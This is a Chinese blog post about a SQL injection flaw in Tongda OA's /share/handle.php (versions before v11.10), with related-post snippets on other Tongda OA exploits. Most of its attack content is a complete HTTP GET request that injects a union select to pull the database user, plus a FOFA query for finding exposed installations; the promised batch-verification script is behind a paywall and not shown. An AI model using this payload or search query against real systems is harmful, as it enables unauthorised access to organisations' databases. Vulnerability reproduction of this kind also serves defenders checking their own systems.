通达oasharehandle.phpsql注入漏洞(含批量验证poc)

已于 2024-04-07 13:57:56 修改
阅读量41 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-07 13:57:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137461748
版权

漏洞描述

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是适合各个行业用户的综合管理办公平台。该系统sharehandle.php页面存在get型sql注入

漏洞影响版本

通达OA < v11.10
FOFA:app=”TDXK-通达OA”

漏洞复现

漏洞验证poc

GET /share/handle.php?_GET[module]=1%27+and+1={`=%27`+1}+and+1=0+union+select+(select/**/user())--+%27 HTTP/1.1
Host: XX.XX.XX.XX
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=o9hn7o3sm890l5ift132pno1s6
Connection: close

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现-通达OA通达OA share存在前台SQL注入漏洞
xiaokp7的博客
02-18 444
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA /share/handle.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。
通达OA系统11.2漏洞
qq_50854662的博客
12-02 4515
通达OA系统11.2版本为案例的Web渗透
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 1910
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录。
通达OA漏洞分析合集
不忘初心,护天下安全!
06-21 4140
通达OA是一套使用比较广泛的办公系统。随着国家护网的开展,通达OA成为渗透人员优先尝试的目标,暴露出了大量漏洞,以下进行介绍。判断通达版本爆破用户、邮箱GET 参数可获取username、email获得计算机名 通达OA v2014 app="TDXK-通达OA" app="TDXK-通达OA" && (title="2013" || title="2015")通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏
通达OA远程命令执行漏洞利用复现(exp,getshell)
Beret-81的博客
07-07 4412
通达OA远程命令执行漏洞利用复现一、漏洞描述二、环境搭建三、影响版本四、漏洞复现五、工具使用 一、漏洞描述 通达OA是由北京通达信科科技有限公司开发的一款办公系统,前一段时间通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。 二、环境搭建 1、通达OA下载后,一键安装 下载地址:http://www.tongda2000.com/download/down.php
瑞友天翼2024SQL注入漏洞poc
最新发布
02-27
瑞友天翼2024SQL注入漏洞poc
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
NACOS身份认证绕过漏洞批量检测poc.7z
最新通达漏洞各版本利用poc.rar
03-31
最新通达漏洞各版本利用poc
[ 漏洞复现篇 ] 通达 OA11.6 文件上传+RCE 漏洞复现
qq_51577576的博客
04-14 4938
一、漏洞编号 二、漏洞靶场 三、漏洞影响版本 四、FOFA Dork/Google Dork 五、利用漏洞风险 六、漏洞修复方案 七、漏洞利用过程
通达OA任意用户登录漏洞手工复现
桜的博客
04-23 2601
前言 已经有人发poc了,这里就找个网站手工复现一下 影响范围 小于11.5版本、2017版本 开始 首先fofa找到一个目标网站 2017的版的 直接点登录抓包,放到repeater中 然后修改三个地方 更改url/logincheck_code.php、添加UID=1、删除PHPSESSID的值,如果不删除是不会返回一个PHPSESSID的 然后随便抓一个登录处的包,修改url,替换s...
通达OA 漏洞分析
BlusKing
03-19 9502
漏洞通报信息: https://mp.weixin.qq.com/s/_bpg8buT92dzRuGdr2ZrRg https://mp.weixin.qq.com/s/s1yqJNOsCk-uVyCtg6SG7A OA-2017非官网:http://www.downxia.com/downinfo/202980.html 最新版v11下载地址:http://www.tongda20...
通达OA远程代码执行漏洞通告
m0_48368237的博客
01-14 1946
致远OA ajax.do登录绕过任意文件上传 漏洞描述 致远OA是一套办公协同管理软件。近日,奇安信CERT监测到致远OA的相关漏洞信息。由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远OA官方已针对该漏洞提供补丁。鉴于漏洞危害较大,建议用户尽快应用补丁更新。 漏洞影响 致远OA V8.0 致远OA V7.1、V7.1SP1 致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3 致远OA V6
通达OA的前台任意用户登录漏洞
weixin_50464560的博客
03-16 2209
1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。通达OA官方于2020年4月17日发布安全更新。2 影响版本通达OA < 11.5.200417版本通达OA 2017版本3 漏洞原理本次复现为2017版本,则重点分析该版本,但原理都是基本相同的,只不过文件路径不同而已。根据POC的代码分析如下,该漏洞涉及的文件包以下四个:/ispirit/login_code.php/genera
完整版通达OA2015-2017版本1day漏洞利用
weixin_50464560的博客
12-07 2729
转载至https://www.freebuf.com/articles/web/260380.html 此次渗透主要利用了通达OA系统的一个nday漏洞+两个1day漏洞,目前网上均无具体完整的poc,本文将尽可能详细地总结一下利用过程目标站点:探测后判断为通达OA2015版本系统,存在多处sql注入漏洞与登录绕过漏洞,因通达OA2015版本已对多个sql危险函数进行过滤,故sql注入利用价值不高,下文具体复现一下登录绕过漏洞漏洞1:全局变量覆盖漏洞因没找到2015版的通达OA源码,故搬运一下乌云上的分析
通达OA漏洞比getshell还要牛的system权限
hackzkaq的博客
04-20 2058
更多黑客技能 公众号:白帽子左一 作者:掌控安全-master 一位向往于任意门的白帽少年,我的奇技淫巧,让你尽可能的getshell. 今天的主角通达OA,前段时间黑产界的杀手,开始吧! 0x00 漏洞简介 CNVD:CNVD-2020-26562 通达OA是由北京通达信科科技有限公司开发的一款办公系统,前几天通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。 攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包,实现远程命令执行,且攻击者无须登陆认证即可完成攻
编写一个能够验证dvwasql注入漏洞poc
07-13
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。 ``` import requests def check_sql_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值